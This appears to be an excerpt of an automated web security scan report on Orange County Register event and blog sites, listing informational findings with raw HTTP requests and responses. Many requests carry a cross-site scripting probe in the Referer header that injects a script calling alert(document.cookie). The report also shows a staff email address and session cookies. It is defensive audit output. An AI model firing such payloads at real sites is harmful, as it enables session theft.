User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1296750717165; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296972000168%26vn%3D1; s_vnum_m=1298959200170%26vn%3D1; s_cc=true; s_nr=1296750723302; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 16:31:42 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 25
ETag: "07edff54e905ec993f4b1ba72b1da1af"
X-Content-Digest: 9c9f7a9cc7a9305617aba864096bc0057af5cf50
Cache-Control: max-age=1800, public
Set-Cookie: welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; path=/; expires=Fri, 03-Feb-2012 16:31:42 GMT
Set-Cookie: zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; path=/; expires=Fri, 03-Feb-2012 16:31:42 GMT
Age: 0
Content-Length: 22039

Zvents_load_ZventsWidget1('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Hair","price":"$20-$80","private":false,"editors_pick":false,"url":"http://www.scfta.org/home/Events/EventDetail
...[SNIP]...

5.2. http://events.orangecounty.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.orangecounty.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: events.orangecounty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:05:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 49
ETag: "960148c0939ccfa59a4adae1df85f228"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: welcome=hXw8A_Jd4WvnW0RKs5F2WA.100548890; path=/; expires=Fri, 03-Feb-2012 19:05:08 GMT
Set-Cookie: zvents_tracker_sid=hXw8A_Jd4WvnW0RKs5F2WA.100548890; path=/; expires=Fri, 03-Feb-2012 19:05:08 GMT
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlODMyNzk0YTE3M2JmNTZmOTQ5MWRmOGE3ODViNmQxZjgiDWxvY2F0aW9uexAiCWNpdHkiC0lydmluZSILcmFkaXVzaTciDWxhdGl0dWRlZhozMy42NzEzOTk5OTk5OTk5OTgARGciCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9JcnZpbmUsIENBIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtMTE3Ljc5MQDItCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlIgdDQQ%3D%3D--db2922533205e58d9924900a48730d8aa66129a6; path=/; expires=Tue, 03-May-2011 19:05:08 GMT; HttpOnly
Content-Length: 73861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...

6. Email addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fastfood.ocregister.com
Path:   /2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/

Issue detail

The following email address was disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET /2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/ HTTP/1.1
Host: fastfood.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:05:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:01:36 +0000
Cache-Control: max-age=87, must-revalidate
X-Pingback: http://fastfood.ocregister.com/xmlrpc.php
Link: <http://fastfood.ocregister.com/?p=86514>; rel=shortlink
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<a href="mailto:nluna@ocregister.com">nluna@ocregister.com</a>
...[SNIP]...
<a href="mailto:nluna@ocregister.com">
...[SNIP]...

7. HTML does not specify charset  previous  next
There are 11 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


7.1. http://fastfood.ocregister.com/files/2010/04/OMG_BurgerSLIDE-SHOW-150x112.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fastfood.ocregister.com
Path:   /files/2010/04/OMG_BurgerSLIDE-SHOW-150x112.jpg

Request

GET /files/2010/04/OMG_BurgerSLIDE-SHOW-150x112.jpg HTTP/1.1
Host: fastfood.ocregister.com
Proxy-Connection: keep-alive
Referer: http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E95bfb7dccc8=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1296750767605; s_lastvisit=1296846841969; fi_dslv=Less%20than%207%20days; s_vnum_w=1296972000168%26vn%3D2; s_vnum_m=1298959200170%26vn%3D2; AxData=; Axxd=1; s_cc=true; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; 44146092a8373b49c062f68d9825aa14=1

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 19:27:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Sat, 03 Apr 2010 00:06:43 GMT
Cache-Control: max-age=271, must-revalidate
Content-Length: 9430
ETag: "d302a3a9d31b78291e19ca97cec5fe29"
Expires: Mon, 07 Apr 2014 05:14:10 GMT
Content-Type: text/html

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90
...C......................
.....
...
.................................C.......    ..    .................................
...[SNIP]...

7.2. http://fastfood.ocregister.com/files/2010/05/Hans-Homemade-Ice-Cream_web-150x112.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fastfood.ocregister.com
Path:   /files/2010/05/Hans-Homemade-Ice-Cream_web-150x112.jpg

Request

GET /files/2010/05/Hans-Homemade-Ice-Cream_web-150x112.jpg HTTP/1.1
Host: fastfood.ocregister.com
Proxy-Connection: keep-alive
Referer: http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E95bfb7dccc8=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1296750767605; s_lastvisit=1296846841969; fi_dslv=Less%20than%207%20days; s_vnum_w=1296972000168%26vn%3D2; s_vnum_m=1298959200170%26vn%3D2; AxData=; Axxd=1; s_cc=true; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; 44146092a8373b49c062f68d9825aa14=1

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 19:28:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Tue, 01 Jun 2010 05:07:10 GMT
Cache-Control: max-age=4, must-revalidate
Content-Length: 5325
ETag: "6ef4deef2933e046ddb42de2fc60ce28"
Expires: Mon, 07 Apr 2014 05:09:46 GMT
Content-Type: text/html

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90
...C......................
.....
...
.................................C.......    ..    .................................
...[SNIP]...

7.3. http://fastfood.ocregister.com/files/2010/09/Zagat_BestDining2011-150x112.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fastfood.ocregister.com
Path:   /files/2010/09/Zagat_BestDining2011-150x112.jpg

Request

GET /files/2010/09/Zagat_BestDining2011-150x112.jpg HTTP/1.1
Host: fastfood.ocregister.com
Proxy-Connection: keep-alive
Referer: http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E95bfb7dccc8=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1296750767605; s_lastvisit=1296846841969; fi_dslv=Less%20than%207%20days; s_vnum_w=1296972000168%26vn%3D2; s_vnum_m=1298959200170%26vn%3D2; AxData=; Axxd=1; s_cc=true; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; 44146092a8373b49c062f68d9825aa14=1

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 19:27:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Wed, 29 Sep 2010 20:14:16 GMT
Cache-Control: max-age=271, must-revalidate
Content-Length: 6426
ETag: "c1b76bb3f270da7ba798d7c34603635a"
Expires: Mon, 07 Apr 2014 05:14:10 GMT
Content-Type: text/html

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90
...C......................
.....
...
.................................C.......    ..    .................................
...[SNIP]...

7.4. http://fastfood.ocregister.com/files/2010/12/FoodMontage-150x150.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fastfood.ocregister.com
Path:   /files/2010/12/FoodMontage-150x150.jpg

Request

GET /files/2010/12/FoodMontage-150x150.jpg HTTP/1.1
Host: fastfood.ocregister.com
Proxy-Connection: keep-alive
Referer: http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E95bfb7dccc8=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1296750767605; s_lastvisit=1296846841969; fi_dslv=Less%20than%207%20days; s_vnum_w=1296972000168%26vn%3D2; s_vnum_m=1298959200170%26vn%3D2; AxData=; Axxd=1; s_cc=true; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; 44146092a8373b49c062f68d9825aa14=1

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 19:27:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Tue, 14 Dec 2010 19:44:02 GMT
Cache-Control: max-age=64, must-revalidate
Content-Length: 11782
ETag: "65f8b28c6976ce23a7ca668e2258efa0"
Expires: Mon, 07 Apr 2014 05:10:43 GMT
Content-Type: text/html

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90
...C......................
.....
...
.................................C.......    ..    .................................
...[SNIP]...

7.5. http://fastfood.ocregister.com/files/2010/12/blog_fastfood_mug_rh.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fastfood.ocregister.com
Path:   /files/2010/12/blog_fastfood_mug_rh.png

Request

GET /files/2010/12/blog_fastfood_mug_rh.png HTTP/1.1
Host: fastfood.ocregister.com
Proxy-Connection: keep-alive
Referer: http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E95bfb7dccc8=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1296750767605; s_lastvisit=1296846841969; fi_dslv=Less%20than%207%20days; s_vnum_w=1296972000168%26vn%3D2; s_vnum_m=1298959200170%26vn%3D2; AxData=; Axxd=1; s_cc=true; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; 44146092a8373b49c062f68d9825aa14=1

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 19:27:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Sat, 04 Dec 2010 00:20:30 GMT
Cache-Control: max-age=279, must-revalidate
Content-Length: 21753
ETag: "5a52c41c6eadc1a6e5ddfb3a05ebc2b8"
Expires: Mon, 07 Apr 2014 05:14:20 GMT
Content-Type: text/html

.PNG
.
...IHDR...M...g......0.v....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<..T.IDATx...    .$.Y?..uvu...3;.;{...j%YF.u.....#..c........c..C....?G...`n.`..3`.... ..l....J{....=.ww.......r]].3{I
...[SNIP]...

7.6. http://fastfood.ocregister.com/files/2011/01/JWA-montage-150x64.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fastfood.ocregister.com
Path:   /files/2011/01/JWA-montage-150x64.jpg

Request

GET /files/2011/01/JWA-montage-150x64.jpg HTTP/1.1
Host: fastfood.ocregister.com
Proxy-Connection: keep-alive
Referer: http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E95bfb7dccc8=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1296750767605; s_lastvisit=1296846841969; fi_dslv=Less%20than%207%20days; s_vnum_w=1296972000168%26vn%3D2; s_vnum_m=1298959200170%26vn%3D2; AxData=; Axxd=1; s_cc=true; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; 44146092a8373b49c062f68d9825aa14=1

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 19:28:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 13 Jan 2011 17:31:14 GMT
Cache-Control: max-age=78, must-revalidate
Content-Length: 6153
ETag: "e7dbb55e54c421f2605d8dd0375e9d1e"
Expires: Mon, 07 Apr 2014 05:10:58 GMT
Content-Type: text/html

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90
...C......................
.....
...
.................................C.......    ..    .................................
...[SNIP]...

7.7. http://fastfood.ocregister.com/files/2011/01/fastfood_cheapchic.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fastfood.ocregister.com
Path:   /files/2011/01/fastfood_cheapchic.png

Request

GET /files/2011/01/fastfood_cheapchic.png HTTP/1.1
Host: fastfood.ocregister.com
Proxy-Connection: keep-alive
Referer: http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E95bfb7dccc8=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1296750767605; s_lastvisit=1296846841969; fi_dslv=Less%20than%207%20days; s_vnum_w=1296972000168%26vn%3D2; s_vnum_m=1298959200170%26vn%3D2; AxData=; Axxd=1; s_cc=true; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; 44146092a8373b49c062f68d9825aa14=1

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 19:28:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Tue, 11 Jan 2011 19:14:14 GMT
Cache-Control: max-age=285, must-revalidate
Content-Length: 6180
ETag: "6cc789f7ca517658a0ed4081c3609214"
Expires: Mon, 07 Apr 2014 05:14:26 GMT
Content-Type: text/html

.PNG
.
...IHDR.......2.............gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..]yl..u.{fggg..cI.R....D..d..e%V.#..8N`9A...8m.6...)...l.E..A.....a;H...    $v.X.-..)Q....x_{...}.G\....,.
...[SNIP]...

7.8. http://fastfood.ocregister.com/files/2011/01/fastfood_jack.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fastfood.ocregister.com
Path:   /files/2011/01/fastfood_jack.png

Request

GET /files/2011/01/fastfood_jack.png HTTP/1.1
Host: fastfood.ocregister.com
Proxy-Connection: keep-alive
Referer: http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E95bfb7dccc8=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1296750767605; s_lastvisit=1296846841969; fi_dslv=Less%20than%207%20days; s_vnum_w=1296972000168%26vn%3D2; s_vnum_m=1298959200170%26vn%3D2; AxData=; Axxd=1; s_cc=true; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; 44146092a8373b49c062f68d9825aa14=1

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 19:28:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Tue, 11 Jan 2011 19:14:15 GMT
Cache-Control: max-age=285, must-revalidate
Content-Length: 5487
ETag: "a5f9e8ce7d2aa539d761775c872c7b4f"
Expires: Mon, 07 Apr 2014 05:14:26 GMT
Content-Type: text/html

.PNG
.
...IHDR.......2.............gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..]kp.....~.S....l..d......M*..    ..ZLe..ClRI.R    a.6..*......e..M\.e......@
..1...l..#.d    [...<{.q...s.a,...
...[SNIP]...

7.9. http://fastfood.ocregister.com/files/2011/01/fastfood_twitter.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fastfood.ocregister.com
Path:   /files/2011/01/fastfood_twitter.png

Request

GET /files/2011/01/fastfood_twitter.png HTTP/1.1
Host: fastfood.ocregister.com
Proxy-Connection: keep-alive
Referer: http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E95bfb7dccc8=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1296750767605; s_lastvisit=1296846841969; fi_dslv=Less%20than%207%20days; s_vnum_w=1296972000168%26vn%3D2; s_vnum_m=1298959200170%26vn%3D2; AxData=; Axxd=1; s_cc=true; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; 44146092a8373b49c062f68d9825aa14=1

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 19:28:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Tue, 11 Jan 2011 19:14:13 GMT
Cache-Control: max-age=279, must-revalidate
Content-Length: 5157
ETag: "2aa72ff1261eeba0b32dd0a1a40eeb85"
Expires: Mon, 07 Apr 2014 05:14:20 GMT
Content-Type: text/html

.PNG
.
...IHDR.......2.............gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..]..UEz..s...w^0..y.n...L.,...Z.(....`i-nJ......[.J|..)e.b.UVY
   ......+...$*...e]..V'...y...O.....9s....
...[SNIP]...

7.10. http://fastfood.ocregister.com/files/2011/01/image001-300x245.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fastfood.ocregister.com
Path:   /files/2011/01/image001-300x245.jpg

Request

GET /files/2011/01/image001-300x245.jpg HTTP/1.1
Host: fastfood.ocregister.com
Proxy-Connection: keep-alive
Referer: http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E95bfb7dccc8=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1296750767605; s_lastvisit=1296846841969; fi_dslv=Less%20than%207%20days; s_vnum_w=1296972000168%26vn%3D2; s_vnum_m=1298959200170%26vn%3D2; AxData=; Axxd=1; s_cc=true; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; 44146092a8373b49c062f68d9825aa14=1

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 19:27:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 27 Jan 2011 22:05:43 GMT
Cache-Control: max-age=283, must-revalidate
Content-Length: 25785
ETag: "13b09eac8231a23d01366445d0588f00"
Expires: Mon, 07 Apr 2014 05:14:22 GMT
Content-Type: text/html

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90
...C......................
.....
...
.................................C.......    ..    .................................
...[SNIP]...

7.11. http://fastfood.ocregister.com/files/2011/01/taco_asylum_web-150x112.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fastfood.ocregister.com
Path:   /files/2011/01/taco_asylum_web-150x112.jpg

Request

GET /files/2011/01/taco_asylum_web-150x112.jpg HTTP/1.1
Host: fastfood.ocregister.com
Proxy-Connection: keep-alive
Referer: http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E95bfb7dccc8=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1296750767605; s_lastvisit=1296846841969; fi_dslv=Less%20than%207%20days; s_vnum_w=1296972000168%26vn%3D2; s_vnum_m=1298959200170%26vn%3D2; AxData=; Axxd=1; s_cc=true; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; 44146092a8373b49c062f68d9825aa14=1

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 19:27:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Wed, 12 Jan 2011 18:10:05 GMT
Cache-Control: max-age=78, must-revalidate
Content-Length: 8808
ETag: "7da605d47cb0f3ae45ece59afa6f5783"
Expires: Mon, 07 Apr 2014 05:10:59 GMT
Content-Type: text/html

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90
...C......................
.....
...
.................................C.......    ..    .................................
...[SNIP]...

8. Content type incorrectly stated  previous
There are 12 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


8.1. http://events.ocregister.com/json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://events.ocregister.com
Path:   /json

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /json?jsonsp=Zvents_load_ZventsWidget1&limit=7&p=49&sid=za5509dx0r HTTP/1.1
Host: events.ocregister.com
Proxy-Connection: keep-alive
Referer: http://www.ocregister.com/templates/zventsIframe.php?domain=events.ocregister.com&c=Irvine%2CCA&template=zventsOCR.html&z=92614&p=49&r=30&t=Things+to+do+in+Orange+County
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1296750717165; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296972000168%26vn%3D1; s_vnum_m=1298959200170%26vn%3D1; s_cc=true; s_nr=1296750723302; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 16:31:42 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 25
ETag: "07edff54e905ec993f4b1ba72b1da1af"
X-Content-Digest: 9c9f7a9cc7a9305617aba864096bc0057af5cf50
Cache-Control: max-age=1800, public
Set-Cookie: welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; path=/; expires=Fri, 03-Feb-2012 16:31:42 GMT
Set-Cookie: zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; path=/; expires=Fri, 03-Feb-2012 16:31:42 GMT
Age: 0
Content-Length: 22039

Zvents_load_ZventsWidget1('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Hair","price":"$20-$80","private":false,"editors_pick":false,"url":"http://www.scfta.org/home/Events/EventDetail
...[SNIP]...

